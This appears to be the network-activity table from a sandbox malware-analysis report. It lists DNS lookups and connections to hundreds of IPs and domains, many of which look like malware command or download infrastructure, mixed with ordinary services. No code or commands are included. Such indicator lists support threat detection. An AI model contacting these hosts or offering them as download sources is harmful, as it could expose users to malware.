| HK | 47.79.66.210:80 | a15aaa1.oss-cn-hongkong.aliyuncs.com | tcp |
| CN | 123.6.72.99:80 | download.caihong.com | tcp |
| US | 8.8.8.8:53 | marshal-zhukov.com | udp |
| US | 104.21.82.174:443 | marshal-zhukov.com | tcp |
| US | 8.8.8.8:53 | fish.hackbiji.cc | udp |
| US | 144.34.162.13:80 | fish.hackbiji.cc | tcp |
| US | 8.8.8.8:53 | 69.156.79.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.234.82.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.82.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 172.67.181.44:443 | dare-curbys.biz | tcp |
| US | 8.8.8.8:53 | 44.181.67.172.in-addr.arpa | udp |
| HK | 154.201.87.30:8888 | 154.201.87.30 | tcp |
| US | 8.8.8.8:53 | bitkiselurunsiparis.com | udp |
| US | 8.8.8.8:53 | www.medises.co.kr | udp |
| US | 23.241.17.95:80 | 23.241.17.95 | tcp |
| US | 8.8.8.8:53 | 95.17.241.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.87.201.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 172.67.162.65:443 | se-blurry.biz | tcp |
| IR | 185.79.156.69:443 | osecweb.ir | tcp |
| RU | 176.111.174.138:443 | tcp | |
| VN | 103.173.254.78:80 | 103.173.254.78 | tcp |
| CA | 76.67.131.51:80 | 76.67.131.51 | tcp |
| TR | 94.73.144.130:443 | bitkiselurunsiparis.com | tcp |
| KR | 114.201.95.60:80 | www.medises.co.kr | tcp |
| US | 8.8.8.8:53 | 65.162.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.144.73.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.131.67.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.254.173.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dow.andylab.cn | udp |
| BR | 187.115.56.93:8081 | 187.115.56.93 | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.135.115:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 172.67.136.167:443 | zinc-sneark.biz | tcp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | 93.56.115.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.95.201.114.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.136.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | week-dictionary.gl.at.ply.gg | udp |
| US | 147.185.221.22:12466 | week-dictionary.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 104.21.88.210:443 | dwell-exclaim.biz | tcp |
| US | 8.8.8.8:53 | tianyinsoft.top | udp |
| US | 8.8.8.8:53 | d.kpzip.com | udp |
| US | 8.8.8.8:53 | 210.88.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 172.67.173.74:443 | formy-spill.biz | tcp |
| CN | 116.131.57.66:80 | dow.andylab.cn | tcp |
| VE | 167.250.49.155:80 | 167.250.49.155 | tcp |
| US | 8.8.8.8:53 | 74.173.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | qiniuyunxz.yxflzs.com | udp |
| US | 8.8.8.8:53 | storage.soowim.co.kr | udp |
| HK | 154.201.87.30:8888 | 154.201.87.30 | tcp |
| US | 8.8.8.8:53 | 155.49.250.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 8.8.8.8:53 | artemka.spb.ru | udp |
| IR | 185.79.156.69:443 | osecweb.ir | tcp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| CN | 139.9.248.128:80 | tianyinsoft.top | tcp |
| CN | 124.95.177.254:80 | d.kpzip.com | tcp |
| RU | 176.113.115.203:80 | 176.113.115.203 | tcp |
| CN | 106.42.31.65:8088 | tcp | |
| CN | 183.60.150.17:80 | qiniuyunxz.yxflzs.com | tcp |
| KR | 210.216.165.152:443 | storage.soowim.co.kr | tcp |
| US | 8.8.8.8:53 | twizthash.net | udp |
| CN | 47.104.173.216:8082 | tcp | |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| RU | 178.130.39.138:80 | artemka.spb.ru | tcp |
| KR | 193.123.237.45:80 | 193.123.237.45 | tcp |
| KR | 210.216.165.152:80 | storage.soowim.co.kr | tcp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 8.8.8.8:53 | down.mvip8.ru | udp |
| CN | 58.220.203.74:6713 | tcp | |
| CN | 121.43.104.75:8080 | tcp | |
| AT | 81.10.240.105:80 | 81.10.240.105 | tcp |
| HK | 103.68.192.104:80 | taodianla.com | tcp |
| US | 172.67.130.102:443 | down.mvip8.ru | tcp |
| CN | 110.40.51.56:5700 | tcp | |
| DE | 38.242.241.140:80 | 38.242.241.140 | tcp |
| US | 64.234.95.70:80 | 64.234.95.70 | tcp |
| CN | 121.40.100.23:12616 | tcp | |
| FR | 82.127.74.198:5000 | 82.127.74.198 | tcp |
| SE | 94.255.218.185:80 | 94.255.218.185 | tcp |
| CN | 111.42.156.130:8000 | tcp | |
| CN | 39.103.150.56:8888 | tcp | |
| CN | 39.108.237.194:80 | tcp | |
| ES | 31.214.180.12:81 | 31.214.180.12 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 8.8.8.8:53 | support.clz.kr | udp |
| US | 8.8.8.8:53 | znrq.zifwxq.cn | udp |
| US | 8.8.8.8:53 | palharesinformatica.com.br | udp |
| US | 8.8.8.8:53 | eoufaoeuhoauengi.su | udp |
| US | 8.8.8.8:53 | utorrent-backup-server5.top | udp |
| US | 8.8.8.8:53 | dz0nhlj1q8ac3.cloudfront.net | udp |
| CN | 180.117.160.2:80 | tcp | |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| KR | 115.71.237.171:80 | support.clz.kr | tcp |
| KR | 211.220.36.213:80 | 211.220.36.213 | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server5.top | tcp |
| CN | 101.200.223.34:80 | tcp | |
| BR | 186.225.153.226:443 | palharesinformatica.com.br | tcp |
| CN | 120.52.95.247:80 | znrq.zifwxq.cn | tcp |
| CN | 8.138.81.152:5555 | tcp | |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 172.67.162.65:443 | se-blurry.biz | tcp |
| US | 8.8.8.8:53 | noithaticon.vn | udp |
| US | 8.8.8.8:53 | safe.ywxww.net | udp |
| US | 8.8.8.8:53 | update.itopvpn.com | udp |
| US | 8.8.8.8:53 | file.edunet.ac | udp |
| CN | 119.167.70.110:13332 | tcp | |
| IE | 185.166.142.22:443 | bitbucket.org | tcp |
| RU | 83.149.17.194:80 | 83.149.17.194 | tcp |
| CN | 43.241.17.145:8899 | tcp | |
| CN | 52.83.32.119:8899 | tcp | |
| IL | 81.218.175.244:80 | 81.218.175.244 | tcp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| PL | 152.199.23.214:80 | update.itopvpn.com | tcp |
| US | 172.67.181.192:443 | print-vexer.biz | tcp |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| DE | 217.92.214.15:8088 | 217.92.214.15 | tcp |
| KR | 221.143.46.92:80 | file.edunet.ac | tcp |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| PE | 161.132.57.101:80 | www.grupodulcemar.pe | tcp |
| VN | 14.243.221.170:2654 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| CN | 101.126.11.168:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 172.67.136.167:443 | zinc-sneark.biz | tcp |
| ES | 178.156.109.69:81 | 178.156.109.69 | tcp |
| US | 8.8.8.8:53 | cfs13.tistory.com | udp |
| US | 8.8.8.8:53 | melkie.cyou | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| HK | 43.132.13.252:9000 | 43.132.13.252 | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| KR | 121.53.218.30:80 | cfs13.tistory.com | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | ipfs.io | udp |
| US | 209.94.90.1:443 | ipfs.io | tcp |
| US | 104.21.88.210:443 | dwell-exclaim.biz | tcp |
| HK | 156.245.12.57:8000 | 156.245.12.57 | tcp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | 23-122-210-174.lightspeed.cicril.sbcglobal.net | udp |
| BG | 130.185.193.208:8080 | 130.185.193.208 | tcp |
| KR | 203.232.37.151:80 | 203.232.37.151 | tcp |
| US | 8.8.8.8:53 | xss-1253555722.cos.ap-singapore.myqcloud.com | udp |
| RU | 185.215.113.205:8080 | 185.215.113.205 | tcp |
| US | 8.8.8.8:53 | download.skycn.com | udp |
| US | 23.122.210.174:80 | 23-122-210-174.lightspeed.cicril.sbcglobal.net | tcp |
| ES | 217.125.11.90:8080 | tcp | |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| SG | 43.152.64.193:80 | xss-1253555722.cos.ap-singapore.myqcloud.com | tcp |
| KR | 183.115.102.3:80 | 183.115.102.3 | tcp |
| IT | 95.255.114.11:80 | 95.255.114.11 | tcp |
| US | 172.67.173.74:443 | formy-spill.biz | tcp |
| IR | 185.79.156.69:443 | osecweb.ir | tcp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| CN | 122.51.183.116:443 | tcp | |
| CN | 116.114.98.35:80 | download.skycn.com | tcp |
| CN | 47.104.233.213:14319 | tcp | |
| CN | 47.108.236.50:8090 | tcp | |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| CN | 112.33.27.73:443 | tcp | |
| US | 209.141.35.225:80 | 209.141.35.225 | tcp |
| CN | 223.247.198.16:8072 | tcp | |
| US | 72.219.74.233:8080 | 72.219.74.233 | tcp |
| US | 8.8.8.8:53 | support.clz.kr | udp |
| US | 172.67.181.44:443 | dare-curbys.biz | tcp |
| KR | 115.71.237.171:80 | support.clz.kr | tcp |
| US | 172.67.181.192:443 | print-vexer.biz | tcp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | 64.206.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.165.216.210.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.39.130.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.240.10.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.237.123.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.130.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.241.242.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.74.127.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.218.255.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.180.214.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.95.234.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.86.121.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.153.225.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.36.220.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.237.71.115.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.17.149.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.175.218.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.23.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.181.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.214.92.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.46.143.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.109.156.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.127.203.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.13.132.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.218.53.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.90.94.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.12.245.156.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.37.232.203.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.193.185.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.210.122.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.64.152.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.102.115.183.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.35.141.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.74.219.72.in-addr.arpa | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | 11.114.255.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.maan2u.com | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| MY | 103.82.231.117:443 | www.maan2u.com | tcp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | httpbin.org | udp |
| US | 34.224.200.202:443 | httpbin.org | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| KR | 211.168.94.177:3389 | tcp | |
| US | 8.8.8.8:53 | 117.231.82.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.200.224.34.in-addr.arpa | udp |
| MY | 103.82.231.117:443 | www.maan2u.com | tcp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| US | 104.21.82.174:443 | marshal-zhukov.com | tcp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| PL | 217.12.206.79:80 | tcp | |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | data-edge.smartscreen.microsoft.com | udp |
| GB | 172.165.69.228:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | data-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| CN | 1.189.232.189:80 | d.kpzip.com | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| NL | 81.161.238.172:8705 | tcp | |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 29.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| IT | 34.17.28.197:80 | home.fvtekx5vs.top | tcp |
| CN | 218.12.76.159:80 | znrq.zifwxq.cn | tcp |
| CN | 111.6.201.155:80 | download.caihong.com | tcp |
| US | 8.8.8.8:53 | 197.28.17.34.in-addr.arpa | udp |
| RU | 176.111.174.138:443 | tcp | |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | cfs10.blog.daum.net | udp |
| US | 8.8.8.8:53 | soft.wsyhn.com | udp |
| US | 8.8.8.8:53 | src1.minibai.com | udp |
| US | 8.8.8.8:53 | www.bkzj.wang | udp |
| US | 8.8.8.8:53 | static-91-225-132-57.devs.futuro.pl | udp |
| US | 8.8.8.8:53 | softdl.360tpcdn.com | udp |
| US | 8.8.8.8:53 | a12xxx1.oss-cn-hongkong.aliyuncs.com | udp |
| US | 8.8.8.8:53 | utorrent-backup-server.top | udp |
| US | 8.8.8.8:53 | www.maxmoney.com | udp |
| US | 8.8.8.8:53 | 1717.1000uc.com | udp |
| US | 8.8.8.8:53 | sms-szfang.com | udp |
| US | 8.8.8.8:53 | aefieiaehfiaehr.top | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 147.185.221.22:12466 | week-dictionary.gl.at.ply.gg | tcp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | antivirus-helper.publicvm.com | udp |
| US | 8.8.8.8:53 | softcatalog.ru | udp |
| US | 8.8.8.8:53 | ldcdn.ldmnq.com | udp |
| US | 8.8.8.8:53 | api.52kkg.com | udp |
| US | 8.8.8.8:53 | mohibkal.publicvm.com | udp |
| CN | 221.204.72.204:80 | dow.andylab.cn | tcp |
| VN | 103.167.89.125:80 | 103.167.89.125 | tcp |
| FR | 52.222.153.112:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| RU | 176.113.115.37:80 | 176.113.115.37 | tcp |
| VN | 103.221.220.14:443 | noithaticon.vn | tcp |
| SG | 168.138.162.78:80 | 168.138.162.78 | tcp |
| RU | 195.46.176.2:80 | 195.46.176.2 | tcp |
| RU | 193.233.48.194:80 | 193.233.48.194 | tcp |
| CN | 59.175.183.106:6713 | tcp | |
| HK | 156.245.12.220:8000 | 156.245.12.220 | tcp |
| AU | 110.143.54.213:80 | 110.143.54.213 | tcp |
| EC | 186.3.78.195:80 | 186.3.78.195 | tcp |
| US | 8.8.8.8:53 | desquer.ens.uabc.mx | udp |
| CN | 36.138.125.70:8089 | tcp | |
| CN | 61.182.69.190:11111 | tcp | |
| JP | 111.217.175.54:80 | 111.217.175.54 | tcp |
| CN | 39.105.31.193:1389 | tcp | |
| CN | 61.131.3.86:9991 | tcp | |
| CN | 101.133.156.69:7777 | tcp | |
| CN | 47.120.46.210:80 | tcp | |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| DE | 136.243.111.71:741 | antivirus-helper.publicvm.com | tcp |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| IT | 34.17.28.197:80 | home.fvtekx5vs.top | tcp |
| US | 8.8.8.8:53 | 112.153.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.176.46.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.48.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.78.3.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.12.245.156.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.89.167.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.220.221.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.162.138.168.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.54.143.110.in-addr.arpa | udp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| IT | 34.17.28.197:80 | home.fvtekx5vs.top | tcp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | 71.111.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.175.217.111.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| PL | 91.225.132.57:80 | static-91-225-132-57.devs.futuro.pl | tcp |
| DE | 185.88.60.242:80 | nerve.untergrund.net | tcp |
| CN | 101.71.255.146:8195 | tcp | |
| HK | 47.79.66.205:80 | a12xxx1.oss-cn-hongkong.aliyuncs.com | tcp |
| CN | 45.117.11.68:443 | soft.wsyhn.com | tcp |
| MY | 210.19.94.140:443 | www.maxmoney.com | tcp |
| HK | 47.243.125.164:80 | www.bkzj.wang | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server.top | tcp |
| GB | 79.133.176.178:80 | 1717.1000uc.com | tcp |
| CN | 123.234.2.61:80 | src1.minibai.com | tcp |
| KR | 121.53.202.238:80 | cfs10.blog.daum.net | tcp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| US | 104.192.108.17:80 | softdl.360tpcdn.com | tcp |
| JP | 137.220.142.71:443 | sms-szfang.com | tcp |
| HK | 156.245.12.87:8000 | 156.245.12.87 | tcp |
| VN | 14.243.221.170:2654 | tcp | |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | 178.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.60.88.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.177.156.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.132.225.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.12.245.156.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.142.220.137.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.94.19.210.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.125.243.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.202.53.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.66.79.47.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| CN | 124.71.73.181:85 | tcp | |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| CN | 122.228.207.55:80 | qiniuyunxz.yxflzs.com | tcp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | wz.3911.com | udp |
| GB | 82.31.159.47:80 | 82.31.159.47 | tcp |
| US | 8.8.8.8:53 | data.discuz.mobi | udp |
| US | 8.8.8.8:53 | sgz-1302338321.cos.ap-guangzhou.myqcloud.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 165.220.134.146:80 | 165.220.134.146 | tcp |
| CN | 61.131.3.86:9991 | tcp | |
| US | 8.8.8.8:53 | hseda.com | udp |
| US | 8.8.8.8:53 | cfs13.tistory.com | udp |
| US | 8.8.8.8:53 | host-95-255-114-11.business.telecomitalia.it | udp |
| US | 8.8.8.8:53 | utorrent-backup-server3.top | udp |
| RU | 88.212.252.98:443 | softcatalog.ru | tcp |
| GB | 163.181.154.239:443 | ldcdn.ldmnq.com | tcp |
| MX | 148.231.192.3:80 | desquer.ens.uabc.mx | tcp |
| US | 194.147.99.181:80 | api.52kkg.com | tcp |
| US | 8.8.8.8:53 | 47.159.31.82.in-addr.arpa | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | 239.154.181.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.252.212.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.99.147.194.in-addr.arpa | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | 146.134.220.165.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.192.231.148.in-addr.arpa | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| CN | 203.2.65.29:8088 | tcp | |
| HK | 103.43.18.71:88 | 103.43.18.71 | tcp |
| HK | 103.43.18.71:88 | 103.43.18.71 | tcp |
| CN | 203.2.65.29:8086 | tcp | |
| HK | 58.152.32.99:8001 | 58.152.32.99 | tcp |
| DO | 181.36.153.151:80 | 181.36.153.151 | tcp |
| RU | 89.175.186.155:80 | 89.175.186.155 | tcp |
| CN | 122.51.183.116:1234 | tcp | |
| RU | 89.175.24.90:8080 | 89.175.24.90 | tcp |
| VN | 113.160.249.9:80 | 113.160.249.9 | tcp |
| JP | 137.220.142.73:443 | sms-szfang.com | tcp |
| US | 8.8.8.8:53 | bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link | udp |
| FR | 52.222.153.24:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 155.186.175.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.153.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.153.36.181.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.18.43.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.32.152.58.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.249.160.113.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.142.220.137.in-addr.arpa | udp |
| CN | 222.244.110.238:8089 | tcp | |
| CN | 121.4.173.197:443 | data.discuz.mobi | tcp |
| CN | 120.26.3.86:80 | wz.3911.com | tcp |
| IT | 95.255.114.11:80 | host-95-255-114-11.business.telecomitalia.it | tcp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | home.sevkk17sr.top | udp |
| RU | 176.111.174.138:443 | tcp | |
| NL | 81.161.238.172:8705 | tcp | |
| CN | 124.95.180.151:80 | d.kpzip.com | tcp |
| CN | 117.72.70.169:80 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| CN | 218.12.76.158:80 | znrq.zifwxq.cn | tcp |
| CN | 113.219.195.65:80 | download.caihong.com | tcp |
| CN | 123.6.40.224:80 | dow.andylab.cn | tcp |
| CN | 159.75.57.35:443 | sgz-1302338321.cos.ap-guangzhou.myqcloud.com | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server3.top | tcp |
| CN | 211.149.230.178:80 | hseda.com | tcp |
| KR | 211.249.219.23:80 | cfs13.tistory.com | tcp |
| RU | 195.46.176.2:80 | 195.46.176.2 | tcp |
| US | 8.8.8.8:53 | 360down7.miiyun.cn | udp |
| US | 8.8.8.8:53 | www.flechabusretiro.com.ar | udp |
| US | 8.8.8.8:53 | 230.sub-166-166-188.myvzw.com | udp |
| US | 8.8.8.8:53 | update-checker-status.cc | udp |
| RU | 176.111.174.138:443 | tcp | |
| US | 209.94.90.3:443 | bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link | tcp |
| HK | 103.43.18.19:88 | 103.43.18.19 | tcp |
| US | 8.8.8.8:53 | stdown.dinju.com | udp |
| US | 8.8.8.8:53 | perfectperu.com | udp |
| JP | 137.220.142.69:443 | sms-szfang.com | tcp |
| US | 8.8.8.8:53 | cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net | udp |
| HK | 134.122.129.19:80 | 134.122.129.19 | tcp |
| US | 166.150.43.236:80 | 166.150.43.236 | tcp |
| FR | 52.222.153.187:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| US | 147.185.221.22:12466 | week-dictionary.gl.at.ply.gg | tcp |
| CN | 39.103.217.92:80 | tcp | |
| VE | 167.250.49.155:80 | 167.250.49.155 | tcp |
| CN | 218.22.21.248:58080 | tcp | |
| US | 159.250.122.151:8081 | 159.250.122.151 | tcp |
| CN | 47.94.196.131:80 | tcp | |
| JP | 141.147.155.36:8888 | 141.147.155.36 | tcp |
| US | 8.8.8.8:53 | 23.219.249.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.90.94.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.18.43.103.in-addr.arpa | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| CN | 203.2.65.29:8085 | tcp | |
| US | 166.166.188.230:80 | 230.sub-166-166-188.myvzw.com | tcp |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| HK | 156.245.12.57:8000 | 156.245.12.57 | tcp |
| US | 8.8.8.8:53 | 69.142.220.137.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.153.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.129.122.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.43.150.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.122.250.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.155.147.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.188.166.166.in-addr.arpa | udp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| AR | 200.105.67.246:80 | www.flechabusretiro.com.ar | tcp |
| CN | 120.52.95.247:80 | 360down7.miiyun.cn | tcp |
